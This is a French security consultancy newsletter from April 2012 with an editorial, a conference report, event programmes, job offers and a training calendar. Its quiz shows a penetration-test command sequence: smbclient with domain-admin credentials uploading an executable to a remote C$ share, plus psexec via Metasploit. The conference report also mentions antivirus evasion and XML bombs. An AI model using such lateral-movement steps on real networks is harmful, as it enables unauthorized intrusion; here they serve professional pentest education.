[Newsletter HSC] N°92 - Avril 2012
Newsletter d'information de HSC
newsletter at hsc-news.com
Lun 2 Avr 13:33:18 CEST 2012
========================================================================
HSC Newsletter -- N°092 -- avril 2012
========================================================================
« On ne ment jamais tant qu'avant les élections, pendant la guerre et
après la chasse. »
[ Georges Clémenceau ]
--[ Sommaire ]----------------------------------------------------------
1. Éditorial : CISO vs RSSI
2. Le saviez-vous ? La question
3. Compte-rendu de la conférence "JSSI" de l'OSSIR
4. HSC partenaire des 4ièmes GS-DAYS
5. Programme de la conférence "SMSI et normes ISO 27001" demain 3 avril
6. Programme de la conférence "GS-DAYS" demain 3 avril
7. Prix de l'Innovation des Assises de la Sécurité
8. Nouveautés du site web HSC
9. Offres d'emploi : consultants & stagiaires techniques & orga
10. Offre d'emploi : développeur Ruby On Rail (stage/alternance/...)
11. Agenda des interventions publiques
12. Prochaines formations HSC
13. Actualité des associations : Club 27001 et OSSIR
14. Le saviez-vous ? La réponse
--[ 1. Éditorial - Hervé Schauer ]--------------------------------------
Après une semaine passée en compagnie de 50 RSSI nord-américains
(des CISO : Chief Information Security Officer), il est intéressant de
s'interroger sur les différences avec nos RSSI européens, principalement
francophones et français, que j'ai plus l'habitude de côtoyer.
Bien sûr, les américains se distinguent par une approche par la conformité
et le déploiement de quelques mesures de sécurités a priori, et leur
maintien dans le temps, sans aucune cartographie d'actifs, sans appréciation
des risques, sans savoir pourquoi. Leur discours est qu'ils s'alignent sur le
business, mais concrètement ils ne savent pas lequel ni comment.
Au-delà de cette constatation il faut interpréter cela comme du pragmatisme :
le CISO doit commencer par des urgences sans avoir un engagement approprié
de la direction, sans avoir le temps et la possibilité de tout comprendre,
ni d'aller interviewer les gens, ni d'apprécier les risques, donc il fait de
suite de la sécurité opérationnelle, il fait des tests de vulnérabilités, il
met en place une gestion des incidents de sécurité sans attendre qu'un
premier incident lui arrive. Donc le CISO américain met en place des mesures
avec les moyens qu'il a, et les maintient dans le temps. Il le fait a priori,
sans savoir pourquoi, juste dans son approche 'conformité'.
Au-delà de cette différence classique d'approche par la conformité,
et de l'utilisation de la gestion des risques que plus tard, il faut ajouter
le fait qu'ils ne connaissent rien à l'ISO27001, pas même son existence.
Quand un CISO américain connaît c'est parce que quelqu'un leur a demandé
de s'y intéresser, mais souvent c'était une partie prenante japonaise,
chinoise, ou européenne, mais pas une autre société américaine. Ils
reproduisent les principes, connaissent Deming et la qualité, mais pas
l'ISO 27001. Ils assimilent "ISO" à ISO 27002, c'est ISO 27002 qu'ils
connaissent et rien d'autre des normes.
Autre petite différence à mes yeux, ils ont tous une connaissance et une
capacité à gérer des projets, à gérer le changement et à gérer les processus
achats de manière très détaillée, ce sont des managers au sens large ou des
individus qui tentent de l'être.
La plus forte différence c'est sur le plan technique. Je suis très
impressionné par les connaissances techniques approfondies des CISO
américains, et leur volonté de combler leurs lacunes techniques.
Même pour des CISO pas rattachés au DSI mais rattachés à la direction, ils
cumulent à l'aspect politique de la fonction un côté opérationnel très fort
de la sécurité, et quasi-systématique. Ils veulent comprendre et savoir
mesurer le temps que doit prendre chaque tâche technique, de
l'approvisionnement d'un rôle à la suppression d'une règle dans un firewall,
ils veulent comprendre le fonctionnement et l'utilité des dispositifs de
sécurité et connaître tous les mécanismes de contournement de ces dispositifs.
Plus impressionnant encore à mes yeux, les CISOs américains savent utiliser
et exploiter par eux-mêmes et sans aide externe tous les logiciels libres
utiles en SSI. Pour la recherche de vulnérabilités ce n'est pas juste
lancer Nessus, mais aussi maîtriser hping, p0f et nmap comme en France
cela serait demandé à un consultant en audit de sécurité. Ils savent comment
marche TCP/IP, comment analyser eux-mêmes des journaux, pas pour le faire,
ils n'ont pas à le faire eux-mêmes, mais simplement parce que pour savoir
recruter ceux qui auront à le faire, pour encadrer et utiliser les résultats
de ceux qu'ils le feront, ils veulent savoir le faire eux-mêmes. Cela m'a
étonné et épaté. Dans la culture nord-américaine une personne expérimentée
et technique est très bien vue, alors qu'en France elle ne progresse plus
vraiment dans sa carrière et aura tendance à être dénigrée.
Si nous avons à apprendre aux américains en terme de gestion des
risques, ils sont techniquement très impressionnants. Cette compétence
technique des CISO américains est peut-être à méditer du côté français.
--[ 2. Le saviez-vous ? La question ]-----------------------------------
Lors d'un test d'intrusion mené au sein d'un domaine Windows et après une
première intrusion sur l'une des machines du domaine, il est souvent obtenu
l'accréditation d'un compte administrateur local des machines ou
administrateur du domaine. Il est alors intéressant de se connecter sur les
différentes machines du réseau pour y obtenir des informations (mots de passe
locaux, mots de passe en mémoire, informations contenues sur la machine, etc).
Ayant théoriquement tous les droits sur une machine distante, et dans le cas
où le bureau à distance n'est pas disponible, il est possible d'y déposer des
fichiers exécutables ou de lancer un programme à distance via psexec.
Pourtant un cas existe présentant les symptômes suivant :
$ smbclient -U 'DOMAIN\ADMIN%password' //10.0.0.1/C$
Domain=[DOMAIN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> put executable.exe
NT_STATUS_ACCESS_DENIED opening remote file \executable.exe
Pourtant le dépôt d'un fichier texte ne pose aucun problème :
smb: \> put test.txt
putting file test.txt (3387.1 kb/s) (average 3387.1 kb/s)
smb: \> ls
. D 0 Thu Feb 16 16:13:05 2012
.. D 0 Thu Feb 16 16:13:05 2012
test.txt A 430080 Thu Feb 16 16:13:05 2012
59612 blocks of size 4194304. 57392 blocks available
De même, le lancement de psexec via metasploit retourne l'erreur :
NT_STATUS_ACCESS_DENIED
Que se passe-t-il ? Comment contourner et lancer un exécutable à distance ?
Réponse au paragraphe 14.
--[ 3. Compte-rendu de la conférence "JSSI" de l'OSSIR ]----------------
Par Pascal Mazon et Jérémy Rubert
Le 13 mars dernier s'est déroulée au Fiap Jean Monnet la 11è Journée de la
Sécurité des Systèmes d'Information (JSSI) organisée par l'OSSIR.
La conférence a débuté par une présentation de Philippe Bernard, RSSI
France de MBDA, présentant sa vision en tant que client d'audits de
sécurité. Il a ainsi rappelé les différentes raisons de faire un audit, les
avantages de faire appel à une société de services pour le réaliser, en
particulier l'impact plus fort pour la direction, et les critères de
choix. Parmi ceux-ci, la confiance en l'entreprise, sa réputation et la
qualité de sa réponse ressortent tout particulièrement. Philippe Bernard
conclut sur l'adhésion de l'équipe auditée et sur les aspects positifs et
négatifs à présenter équitablement dans la restitution.
Le deuxième exposé a porté sur le pare-feu applicatif Naxsi, présenté par
Thibault Koechlin de NBS System. Après une rapide revue des risques liés aux
applications web, le vif du sujet a été abordé. Naxsi met en avant quatre
objectifs, à savoir la sécurité, les performances, l'industrialisation et la
souplesse. Grâce à un mode d'apprentissage (analyse de requêtes légitimes), le
logiciel génère une liste blanche. Le fonctionnement se veut simple (42 règles
prévues pour contrer les SQLi, XSS, RFI/LFI, etc.) et ouvert (licence
GPLv3). Naxsi a été mis en oeuvre en très peu de temps suite à la défiguration
du site de Charlie Hebdo. Après une semaine 32000 requêtes HTTP et 200
adresses IP ont été bloquées.
La troisième présentation concernait les aspects légaux des Tests
d'Intrusion. Frédéric Connes d'HSC, ingénieur informaticien et docteur en
droit, nous a ainsi rappelé les enjeux des TI au regard de la loi. En
particulier, l'article 323-1 du code pénal qui prévoit de punir les accès
aux Systèmes de Traitement Automatisé de Données, qui sont fait de manière
*frauduleuse*. Avec le consentement de l'audité, l'accès n'est plus
frauduleux et n'entre pas sous le coup de la loi. Des explications sur les
éléments à intégrer dans la convention d'audit ont été faites, pour s'assurer
d'être bien couvert. Par exemple, le dépôt de preuve d'intrusion doit être
formalisé dans la convention d'audit. Frédéric Connes est également revenu sur
l'utilisation, la détention, etc. d'un outil d'intrusion, qui est possible
pour un motif légitime (ce qui est le cas des TI), en respect de l'article
323-3 du code pénal. Un dernier point portait sur l'usurpation d'identité,
très utile pour l'ingénierie sociale. L'usurpation est possible à condition
qu'elle ne trouble pas la tranquillité de la victime.
Pour clore la matinée, Jean-Philippe Gaulier, OSSIR, a animé une table
ronde, réunissant :
- Philippe Bernard (RSSI MBDA)
- Olivier Caleff (Fédération des Professionnels des Tests Intrusifs)
- Olivier Dembour (ARJEL)
Cette dernière a été l'occasion de débattre du métier de prestataire en SSI,
avec notamment une différenciation des chartes de prestataire d'audit
proposées par l'ANSSI et la FPTI. Cela soulève le problème des prestataires
venus uniquement pour l'argent, qui n'ont pas pour autant de problème à
respecter le cadre "réglementaire". La pertinence de la qualification
personnelle et d'entreprise a été ensuite débattue ; le milieu de la sécurité
étant restreint, le bouche à oreille reste aussi une source privilégiée. Pour
finir, un débat sur le Cloud Computing a émergé, d'où il est ressorti que la
législation française doit être impérativement respectée et les contraintes
doivent être imposées par les clients, non pas par les prestataires
d'externalisation.
Laurent Butti, Orange Portals, a ouvert l'après-midi avec un retour
d'expérience sur les outils d'audit d'applications Web en boite noire en se
basant uniquement sur des outils open source. Le contexte d'une application
web et de son exposition aux attaques a été d'abord exposé. L'importance de la
performance des trois briques qui composent un outil d'audit d'application
(crawler, brique d'injection et algorithmes de découverte) a été rappelée. Si
l'une d'entre elle est peu efficace, c'est toute l'analyse qui deviendra
médiocre. Le conférencier nous a fait part de son retour d'expérience suite
aux tests qu'il a menés. Il en ressort de bons résultats sur des sites dits
"simples" à parcourir contrairement aux sites contenants beaucoup de
JavaScript. Le plus performant de ces outils est, a priori, arachni full avec
une configuration de base qui peut être modifiée pour grandement améliorer ses
performances. Ces outils ont toutefois leurs limites. Face à un site
complexe, l'analyse doit être manuelle. Dans tous les cas une analyse manuelle
reste indispensable pour vérifier les résultats et être plus exhaustif.
La seconde présentation de l'après-midi concernait les injections NoSQL,
base de données utilisée aujourd'hui par les grands du web par souci de
performance. Nicolas Viot, de NGM Security, a commencé par présenter ce qu'est
une base de données NoSQL, à savoir, une base de données non relationnelle qui
ne possède pas de schéma pré-défini et qui n'utilise plus le langage SQL. Une
fois la syntaxe utilisée pour une de ces bases de données présentée, des
démonstrations d'injection sur MongoDB ont été faites. Ces injections sont
similaires aux injections SQL classiques et offrent les mêmes capacités. Le
NoSQL est une nouvelle technologie qui possède les mêmes vulnérabilités que
les anciennes. La gestion des entrées utilisateurs reste donc centrale dans la
sécurité des applications. Le NoSQL reste toutefois, pour le moment, non
standardisé, chaque base possède son propre langage. Il est donc difficile
d'automatiser ces attaques.
Nicolas Grégoire, Agarri, nous a par la suite présenté une conférence
intitulée XML et sécurité. Une mise à niveau sur le XML a d'abord été faite en
rappelant les différents cas d'usages du XML (SVG, SOAP, XSL, XSPF, RSS, ...).
La principale question à se poser pour identifier une vulnérabilité est
la suivante : "Le contenu XML est-il interprété ?". Deux cas de détournement
du XML ont été exposés. Tout d'abord l'encapsulation d'un PDF malfaisant dans
du XDP, ce qui le rend totalement indétectable par les antivirus à l'heure
actuelle, démonstration à l'appui. Puis un cas de déni de service a été
présenté en générant une énorme quantité de données lors de l'ouverture d'un
PDF (technique de la "XMLBomb", ou "Lol 10^9"), ce qui a pour effet de saturer
les ressources de la machine ciblée (CWE-776).
Pour finir cette journée, Nicolas Hanteville, Devoteam, a fait une
présentation du forensic Windows. Le sujet étant extrêmement vaste, la
conférence a porté sur la base de registre, le système de fichiers et les
journaux. Après avoir exposé les causes d'une investigation inforensique,
différents moyens et outils pour récupérer ces informations ont été
cités. Suite au constat d'un nombre limité d'outils ou effectuant une analyse
globale de la machine et bien souvent payants, la conférence s'est finie sur
la présentation d'un outil libre pour effectuer des analyses inforensique
Windows : RtCA. Il est programmé en C 32bits ou 64bits et il est compatible
Windows XP, 2003, 2008, 7, 8 ainsi qu'avec Wine.
--[ 4. HSC partenaire des 4èmes GS-DAYS ]------------------------------
HSC sera à nouveau présent comme l'an dernier aux 4ème GS-Days 2012 demain
mardi 3 avril 2012 : http://www.gsdays.fr/HSC-Herve-Schauer-Consultant.html
avec un stand. Les GS-Days se tiennent au coeur de Paris à coté des Halles à
l'espace Saint-Martin : http://www.espacesaintmartin.com/paris/html/plan.html
Matthieu Hentzien et Lynda Benchikh seront à votre disposition pour
vos projets de prestations et de formation. Retrouvez-nous sur notre stand
durant toute la journée.
Romain Coltel fera une présentation "Analyse des protections et
mécanismes de chiffrement fournis par BitLocker".
Le programme des conférences est publié au paragraphe 7. Le bulletin
d'inscription est disponible sur :
http://www.gsdays.fr/sinscrire/10-gsdays-2012.html
Dans la rubrique "Code Promotionnel : " mettez le code d'HSC "a5253B".
Vous ne payerez que 100 ¤ HT pour toute la journée au lieu de 140 ¤ HT.
Inscrivez-vous en ligne, ou bien renvoyez votre bulletin d'inscription par
télécopie au +33 146 562 091, ou encore par messagerie à :
Marc.Jacob at globalsecuritymag.com
--[ 5. Programme de la 5ème conférence "SMSI et normes ISO 27001" ]------
Le Club 27001 (http://www.club-27001.fr/) organise sa cinquième
conférence annuelle sur l'ensemble de la série des normes ISO 27001
le mardi 3 avril 2012 à Paris à l'espace Saint-Martin, dans le
cadre des GS-DAYS.
8h45 : Accueil (petit déjeuner)
9h30 : "L'avenir de l'ISO 27001"
. Matthieu Grall, CNIL, co-rédacteur de l'ISO 27001 à l'ISO
10h15 : "Retour d'expérience : mettre en place un SMSI dans le monde de
la santé"
. Guillaume Deraedt, RSSI, CHRU de Lille
11h00 : Pause
11h30 : "Retour d'expérience : certification d'une offre de service
coffre-fort numérique"
. Eric Rocheux, RSI, Banque de France
12h15 : Déjeuner assis
14h00 : "Résultats du groupe de travail ITIL & ISO 27001 de Toulouse :
conseils et préconisations de mutualisation ISO 2700x et
ISO 20000 /ITIL"
. Nicolas Genotelle, On'X/Edelweb
. Joris Pegli, SRC-Solution
. Emmanuel Prat, Fullsave
. Sébastien Rabaud, SCASSI
14h45 : "Retour d'expérience : mise en oeuvre de l'ISO 27005"
. Johann Fernandez, responsable du SMSI, La Banque Postale
. Laetitia Vincens, La Banque Postale
15h30 : Pause
16h00 : "Mesures d'efficacité couplées à la gestion des incidents de sécurité"
. Stéphane Sciacco, Orange Business Services
16h45 : "Retour d'expérience : d'une certification ISO 9001 vers un SMI
intégrant l'ISO 27001"
. Philippe Dubourg, RSSI, URSSAF/CIRTIL
17h30 : Table-ronde
18h00 : Conclusion
. Eric Doyen, RSSI de Generali et président du Club 27001
Inscription à la conférence (inclut les pauses café et le déjeuner) :
- 290 euros pour les adhérents au Club 27001,
- 590 euros pour les non-adhérents
Rappel : l'adhésion au Club 27001 n'est que de :
- pour un particulier : 27 euros,
- pour une entreprise : 270 euros (donnant droit à 5 entrées à la
conférence au prix remisé), soit une économie jusqu'à 1500 euros
Lieu : http://www.espacesaintmartin.com/paris/html/plan.html
Contact : conference at club-27001.fr
Le Club 27001 ne peut pas être joint par télécopie ou par téléphone.
Bulletin d'inscription :
http://www.club-27001.fr/attachments/article/110/inscriptionconf_2012.pdf
Envoyez votre bulletin d'inscription complété au trésorier du Club 27001
Bertrand Augé : tresorier at club-27001.fr
--[ 6. Programme de la conférence "GS-DAYS" du 3 avril ]-----------------
Imprimez votre programme pour demain !
8h30 : Accueil des participants
--- Session plénière d'ouverture ---
9h00 : Table-ronde animée par Marc Jacob, GlobalSecurityMag : "Qui est le
maillon faible : l'homme ou la machine ?", avec
. Eric Doyen, RSSI de Generali et président du Club 27001
. Diane Mullenex, avocate, Ichay & Mullenex
. Philippe Humeau, consultant en sécurité, dirigeant NBS System
10h30 : pause
--- Programme du cycle de conférences techniques ---
11h00 : "Attaques par fuzzing sur les applications Adobe Flex utilisant
le protocole AMF", Julia Benz, SCRT
11h55 : "Analyse des protections et mécanismes de chiffrement fournis par
BitLocker", Romain Coltel, HSC
12h45 : Déjeuner
14h15 : "Attaques réelles et backdoors .NET", Nicolas Ruff, EADS Innovation
Works
15h10 : "Mise en oeuvre d'un outil d'analyse statique de code source dans
un cycle de développement d'applications Web", Laurent Butti et
Olivier Moretti, Orange Portals
16h00 : Pause
16h30 : "La Fédération des Professionnels des Tests Intrusifs, 12 ans après"
Matthieu Hentzien (HSC) et Olivier Revenu (EdelWeb), FPTI
17h25 : "Piratage de Mac OS X", Arnaud Malard, Devoteam
18h15 : Cocktail
--- Programme du cycle de conférences organisationnelles et juridiques ---
11h00 : "Sept manières infaillibles de faire condamner son RSSI",
Thiébaut Devergranne, conseil de la Société Générale dans le
cadre de l'affaire Kerviel
11h55 : "Développer des applications Web sécurisées. Et après ?", Jérémie
Jourdain, Advens
12h45 : Déjeuner
14h15 : "Un tableau de bord sécurité comme outil de communication"
Olivier Allaire et Sébastien Michaud, Lineon
15h10 : "Attaques ciblées : quelles évolutions pour la gestion de crise ?",
Gérôme Billois et Frédéric Chollet, Solucom
16h00 : Pause
16h30 : "Quel protocole de fédération pour quel usage ? Complémentarité et
interopérabilité des standards de fédération OAuth, OpenID et SAML
dans des contextes BtoC et BtoB", Fabrice Vazquez, Harmonie
Technologie
17h25 : "Notification des failles de sécurité", Hervé Gabadou, Avocat
Cabinet Courtois Lebel
18h15 : Cocktail
Inscription : http://www.gsdays.fr/sinscrire/10-gsdays-2012.html
Dans la rubrique "Code Promotionnel : " mettez le code d'HSC "a5253B".
Vous ne payerez que 100 ¤ HT pour toute la journée au lieu de 140 ¤ HT.
Inscrivez-vous en ligne, ou bien renvoyez votre bulletin d'inscription par
télécopie au +33 146 562 091, ou encore par messagerie à :
Marc.Jacob at globalsecuritymag.com
Lieu : http://www.espacesaintmartin.com/paris/html/plan.html
Programme en ligne :
http://www.gsdays.fr/373/actualites/programme-previsionnel-des-gs-days-2012-2/
--[ 7. Prix de l'Innovation des Assises de la Sécurité ]-----------------
Attention, limite de dépot des candidatures le 16 avril !
Pour la 7ème année consécutive sera décerné le Prix de l'Innovation
des Assises de la Sécurité. Les Assises se dérouleront à Monaco du
3 au 6 octobre 2012.
Le jury du Prix 2012 est composé de :
Hervé Schauer, HSC, président du jury
Didier Gras, RSSI Groupe BNP Paribas, vice-président du jury
Thierry Auger, DSI-adjoint Groupe Lagardère
Emmanuel Dupuy, DSI Apax Partners
Eric Grospeiller, FSSI Ministère de la Santé
Cyril Gollain, CSO Brainwave (société lauréate en 2011)
Maximilien Oursel, associé, Pleiade Venture
Sylvain Thiry, RSSI Groupe SNCF
Raphael Viard, RSSI Alstom
Ce prix permet à une entreprise innovante dans le domaine de la
sécurité des systèmes d'information de bénéficier d'un accès aux Assises
de la Sécurité afin de démontrer son produit ou son service, avec la
remise du prix en séance plénière le jeudi 4 octobre 2012, et un paquetage
d'une valeur de 25000 euros :
- un espace d'exposition pour démontrer sa solution et rencontrer
les invités, la presse, etc. ;
- un atelier pour présenter sa solution sous forme de conférence.
Le prix est ouvert aux entreprises créées en 2010, 2011 ou 2012.
Les critères utilisés par le comité de sélection sont notamment :
- le caractère innovant et nouveau du produit ou service présenté ;
- l'intérêt pour les RSSI et les métiers associés ;
- les innovations technologiques dans la solution présentée ;
- l'état d'avancement du projet et sa pertinence sur la marché.
Le règlement complet et le dossier de candidature sont disponibles
en téléchargement sur le site des Assises, rubrique Prix de l'Innovation :
http://www.lesassisesdelasecurite.com/
Le dossier est à remplir en ligne dès à présent et au plus tard jusqu'au 16
avril 2012. N'hésitez pas à renvoyer cette annonce autour de vous et à faire
part de votre intérêt à candidater auprès d'Hervé Schauer qui est à la
disposition des candidats éventuels pour leurs questions.
--[ 8. Nouveautés du site web HSC ]-------------------------------------
- HSC adhère à la FPTI (Fédération des Professionnels des Tests Intrusifs)
le 12 mars 2012
http://www.fpti.pro/
- Présentation "Aspects juridiques des tests d'intrusions" par Frédéric
Connes le 13 mars 2012 à la JSSI de l'OSSIR
http://www.hsc.fr/ressources/presentations/jssi2012_juridique/
- Brève "Pré-Qualification Nuit du hack 2012 - Write-up 4005" par Yves Le
Provost le 23 mars 2012
http://www.hsc.fr/ressources/breves/Rop_nuitduhack.html.fr
- Nouvelle version de Dislocker, outil permettant de lire des partitions
chiffrées avec BitLocker sous Linux... et MacOSX maintenant.
http://hsc.fr/ressources/outils/dislocker/
--[ 9. Offres d'emploi pour consultants en sécurité ]-------------------
HSC recrute des consultants en sécurité des systèmes d'information
dans toutes les spécialités.
+-------------------------------------------------------------------------+
| HSC recherche particulièrement des consultants expérimentés (3 à 6 ans) |
| en décompilation et retro-ingénierie, tests d'intrusion, systèmes |
| industriels (SCADA), ainsi que sur l'ISO27001 et la gestion des risques.|
| Vous vous lassez des régies et des missions longues ? N'hésitez pas, |
| profitez de votre expérience pour postuler et faire de l'expertise. |
+-------------------------------------------------------------------------+
Tous les consultants HSC deviennent avec l'expérience formateurs, et
partagent leur expérience acquise lors des prestations en participant
aux formations HSC.
Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC, aussi
bien sur les normes ISO 27001 et ISO 27005 ou le juridique de la SSI, qu'aux
tests d'intrusion, à l'inforensique, la sécurité Windows la sécurité des
applications web et la sécurité SCADA. Cela représente pour chaque nouveau
consultant de 2 à 6 semaines de formations suivies dans le cadre de sa prise
de fonction.
HSC recherche également des stagiaires en fin d'études pour des stages de
pré-embauche pour des postes de consultants, soit au sein de l'équipe
technique, soit au sein de l'équipe conformité, risque et organisation
de la sécurité.
Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la gare
Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2). Si vous
souhaitez proposer votre candidature, nous vous remercions d'envoyer votre CV
en texte ascii (pas de .doc) par courrier électronique à cv at hsc.fr.
--[ 10. Offre d'emploi développeur Ruby On Rails ]----------------------
HSC recherche un développeur pour son application de gestion de la
relation client développée en interne sur la technologie Ruby-On-Rails.
* Description de l'application :
Cette application de gestion de la relation client regroupe les données
commerciales, permet le suivi des propositions commerciales, facilite
la gestion des formations, gère les contacts, etc.
HSC souhaite la faire évoluer pour pouvoir y centraliser la gestion
d'une plus grande partie de son activité et y automatiser de nouvelles tâches.
Les objectifs seront de (de façon non exhaustive) :
- automatiser la création de documents administratifs ;
- automatiser la gestion de calendriers internes ;
- proposer des solutions pour améliorer l'ergonomie ;
- améliorer l'intégration avec l'environnement HSC ;
- récupérer des informations sur des sites externes pour alimenter
les données de l'application ;
- optimiser les performances ;
- collaborer avec les différentes équipes (commerciales, techniques,
organisationnelles) pour imaginer et implémenter des solutions pour
accéder aux différentes informations stockées.
Une grande liberté sera accordée aux choix d'implémentation pour les
extensions à venir, ce qui requiert donc de la part du postulant de la
méthode.
* Environnement de travail :
Vous travaillerez dans un environnement où les technologies et outils libres
sont privilégiés :
- langage de développement objet Ruby
- framework Ruby On Rails
- base de données MySQL
- système d'exploitation Linux
- gestionnaire de version Git
- déploiement à l'aide de Capistrano.
HSC a choisi Ruby On Rails pour le gain de temps qu'il apporte au
développement de fonctionnalités complexes. Structuré autour de la méthode
"MVC" (modèle vue contrôleur), l'ensemble des conventions qu'il adopte permet
à un développeur connaissant Rails de rapidement comprendre le fonctionnement
d'une application pour être au plus vite capable de s'intégrer à son
développement.
L'ajout de fonctionnalités et leur intégration dans l'environnement HSC
pourront de plus vous amener à vous intéresser à des technologies variées
telles que :
- le serveur de téléphonie Asterisk ;
- la gestion des calendriers au format iCalendar ;
- le serveur de listes électroniques Mailman ;
- etc.
* Profil recherché :
- vous aimez la programmation objet et connaissez déjà un langage
de programmation objet orienté Web (Ruby, PHP, Java, ASP, etc)
- vous avez des connaissances sur les technologies du Web (HTML, CSS, SQL,
Javascript, Ajax)
- vous souhaitez vous mettre au Ruby On Rails dans une société avec
une culture résolument geek
- vous êtes motivé(e), ouvert(e), autonome, et capable de proposer des
idées pour améliorer l'existant
- vous avez des qualités de rédaction : documentation, commentaires dans
le code source
- ou encore mieux mais non nécessaire, vous connaissez déjà Ruby, et
la technologie Ruby-On-Rails, par exemple au travers de projets
personnels ou d'étude
HSC propose un CDI, un contrat d'apprentissage ou d'alternance, un stage,
ou tout autre possibilité suivant les souhaits du candidat. Rémunération
motivante adaptée au profil et à l'expérience.
Pour postuler à ce poste, envoyez votre CV et lettre de motivation en
texte ascii (pas de PDF ou DOC) à cv-ruby at hsc.fr.
--[ 11. Agenda des interventions publiques ]----------------------------
- 3 avril 2012 - GS-DAYS, Paris, Espace Saint-Martin
"Analyse des protections et mécanismes de chiffrement fournis par BitLocker"
Romain Coltel
http://www.gsdays.fr/
- 3 avril 2012 - GS-DAYS, Paris, Espace Saint-Martin
"La Fédération des Professionnels des Tests Intrusifs, 12 ans après"
par Matthieu Hentzien (HSC) pour la FPTI
http://www.gsdays.fr/
Retrouvez l'agenda de nos interventions publiques sur
http://www.hsc.fr/conferences/agenda.html.fr
--[ 12. Prochaines formations HSC ]-------------------------------------
Nos prochaines formations sont les suivantes :
- Paris
ISO 27001 Lead Implementer .......... : 2 au 6 avril (#)
Correspondant Informatique et Libertés : 5 et 6 avril
Essentiel de PCI-DSS ................ : 10 avril
Sécurité du Cloud Computing ......... : 11 au 13 avril
ISO 27005 Risk Manager .............. : 16 au 18 avril (#)
Risk Manager Avancé ................. : 19 et 20 avril
Sécurité du WiFi .................... : 3 et 4 mai (*)
Juridique de la SSI ................. : 21 et 22 mai
Sécuriser Windows (SANS SEC505 / GIAC GCWN) : 21 au 25 mai (*)(#)
ISO 27005 Risk Manager .............. : 29 au 31 mai (#)
Essentiel du RGS .................... : 1er juin
Sécuriser Unix&Linux (SANS SEC506/GIAC GCUX): 4 au 8 juin (*)(#)
Tests d'intrusion applicatifs (SEC542/GWAPT): 4 au 8 juin (*)(#)
ISO 27001 Lead Auditor .............. : 4 au 8 juin (#)
ISO 27001 Lead Implementer .......... : 11 au 15 juin (#)
Formation DNSSEC ..................... : 14 et 15 juin (*)
Inforensique Windows (SANS FOR408/GIAC GCFE): 18 au 22 juin (*)(#)
Mesures de sécurité ISO 27002 ........ : 19 et 20 juin
Gestion des incidents de sécurité/ISO27035 : 21 juin
Indicateurs & tableaux de bord SSI/ISO27004 : 22 juin
PenTesting/Ethical Hacking(SANS SEC560/GPEN): 25 au 29 juin (*)(#)
ISO 27005 Risk Manager .............. : 2 au 4 juillet (#)
Défense applications web (DEV522/GIAC CWAD) : 2 au 6 juillet (*)(#)
Analyse inforensique (SANS FOR508/GIAC GCFA): 10 au 14 septembre (*)(#)
Advanced Penetration Testing (SANS SEC660) : 24 au 28 septembre (*)(#)
Fondamentaux & principes de la SSI (SEC401) : 1 au 6 octobre (*)
Formation RSSI ...................... : 15 au 19 octobre
Information Security Foundations .... : 12 et 13 novembre (#)
Gestion des identités et des accès .. : 12 au 14 novembre
(*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
(#) : formations certifiantes
(C) : session de formation complète
- Luxembourg
ISO 27005 Risk Manager .............. : 9 au 11 mai (#)
ISO 27001 Lead Implementer .......... : 24 au 28 sept. (#)
ISO 27001 Lead Auditor .............. : 5 au 9 novembre (#)
- Bordeaux
Correspondant Informatique et Libertés : 11 et 12 octobre
- Lille
Correspondant Informatique et Libertés : février 2013
- Lyon
ISO 27005 Risk Manager .............. : Nous contacter
ISO 27001 Lead Implementer .......... : Nous contacter
Correspondant Informatique et Libertés : 20 et 21 septembre
- Marseille
Correspondant Informatique et Libertés : mars 2013
- Montpellier
Correspondant Informatique et Libertés : 30 et 31 mai
- Nantes
Correspondant Informatique et Libertés : 14 et 15 mai
- Nice
ISO 27005 Risk Manager .............. : 25 au 27 juin (#)
Risk Manager Avancé ................. : 28 et 29 juin
Correspondant Informatique et Libertés : 22 et 23 novembre
- Poitiers
Correspondant Informatique et Libertés : 14 et 15 novembre
- Rennes
Correspondant Informatique et Libertés : 11 et 12 juin
- Strasbourg
Correspondant Informatique et Libertés . : 28 au 29 juin
- Toulouse
Correspondant Informatique et Libertés . : 26 et 27 avril (confirmé)
ISO 27005 Risk Manager .............. : 21 au 23 mai (#)
Risk Manager Avancé ................. : 24 au 25 mai
ISO 27001 Lead Implementer .......... : 18 au 22 juin (#)
Juridique de la SSI ................. : 24 et 25 septembre
(#) : formations certifiantes
HSC est certifié OPQF (http://www.opqf.com/) et ISO9001 (par Moody) sur
ses formations.
Pour tout renseignement, et pour vous inscrire contactez Lynda Benchikh :
formations at hsc.fr -- +33 141 409 704
Retrouvez les tarifs des formations dans la Newsletter n° 64 de janvier 2010
au chapitre 6 : http://www.hsc-news.com/archives/2010/000064.html
Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
notre catalogue 2012 en PDF sur http://www.hsc-formation.fr/
--[ 13. Actualité des associations : Club 27001 et OSSIR ]----------------
o Club 27001 (http://www.club-27001.fr/)
. Conférence annuelle du club demain mardi 3 avril 2012 à Paris !
Programme de la conférence publié au paragraphe 5.
. Prochaine réunion à Paris jeudi 24 mai chez ESR (Meudon)
- Retour d'expérience par Cédric Cartau (CHU de Nantes)
- Seconde présentation en cours de confirmation
- Point divers
. Réunion suivante à Paris le jeudi 20 septembre à 14h00
- Programme en cours d'élaboration
. Prochaine réunion à Toulouse le 27 avril
- Programme en cours d'élaboration
. Prochaines à Marseille, Rennes et Lyon annoncées sur
www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
sur les listes de chaque ville sur www.club-27001.fr pour suivre
l'activité du Club 27001 en région.
o OSSIR (http://www.ossir.org/)
. Prochaine réunion mardi 10 avril 2012 à 14h00, à la Librairie
Eyrolles (RER Saint-Michel, métro Cluny)
- Titre en cours de confirmation par Rory Higgins et Philippe Marxgut
(Mancala Networks)
- Protection des données personnelles et obligations de sécurité
par Thiebaut Devergranne
- Revue d'actualité par Nicolas Ruff (EADS)
. Réunion suivante à Paris le mardi 15 mai 2012
. Prochaine réunion à Lyon annoncée prochainement
. Prochaine réunion à Rennes annoncée prochainement
. Prochaine réunion à Toulouse merdi 15 mai.
. Réunion suivante à Toulouse à la rentrée de septembre.
--[ 14. Le saviez-vous ? La réponse ]------------------------------------
La présence d'un antivirus est en fait à l'origine de cette erreur. En
effet, celui-ci est configuré pour empêcher la copie à distante de fichiers
exécutables.
La règle suivante est configurée :
Standard antivirus : Empêcher la création/modification à distance de fichiers
